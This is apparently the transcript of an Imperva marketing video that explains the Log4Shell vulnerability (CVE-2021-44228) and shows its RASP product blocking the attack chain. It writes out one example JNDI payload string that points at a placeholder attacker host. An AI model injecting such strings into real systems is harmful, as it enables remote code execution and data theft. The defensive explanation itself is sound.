Imperva Up2date: The Log4j Exploit and the call for Runtime Protection (RASP)
Josh Hogle, Sr Technical Marketing Engineer.
Log4j is a popular logging framework maintained by the Apache Software Foundation and used in a very large number of Java-based commercial and open-source applications around the world.
In December 2021, a critical zero-day remote code execution vulnerability, dubbed Log4Shell (CVE-2021-44228), was disclosed in Log4j 2 (versions 2.0-beta9 through 2.14.1), followed by several related CVEs. An attacker places a specially crafted JNDI lookup string, such as `${jndi:ldap://attacker-host/x}`, in an HTTP header or request parameter. When a vulnerable Log4j version logs that input, it evaluates the lookup, connects to the attacker-controlled LDAP (or RMI) server named in the string, and can be made to download and execute malicious code on the target machine. Payloads range from ransomware that fully encrypts the vulnerable server to data-stealing malware and anything in between. Because Log4j is so pervasive in Java applications, and because the vulnerable code path is reached by merely logging untrusted input, any organization running Java applications is potentially at risk.
In this demo, we have four servers: a simple stock ticker application that uses a vulnerable version of the log4j package; an LDAP server and a web server, both controlled by the attacker (the LDAP server answers the JNDI lookup and points the application at code hosted on the web server); and finally a hacker chat server, where stolen data is sent once the malicious code runs on the server hosting the stock ticker application.
Imperva RASP has two places where it can break this attack chain. The first, which is what we'll see in our demo, is the moment the application makes the network request to the attacker's LDAP server. Using a positive security model, in which only known, trusted destinations are permitted, RASP immediately blocks the outbound connection to an unknown or untrusted server.
Because the connection is never made, no malicious code is downloaded or executed on the server. Even if the connection had succeeded and the exploit code had been downloaded, RASP's code execution protection would have prevented the unknown code from running at all. Note that RASP requires no signatures: while other solutions rely on signature-based detection to protect against attacks like Log4Shell, RASP uses a simple configuration that blocks these types of attacks regardless of the input vector or payload obfuscation.
For more information on Imperva RASP, contact your sales team or visit us online at imperva.com. For more product videos with closed captions in Chinese, English, Japanese and Spanish, visit our Video Hub.
Thanks for watching.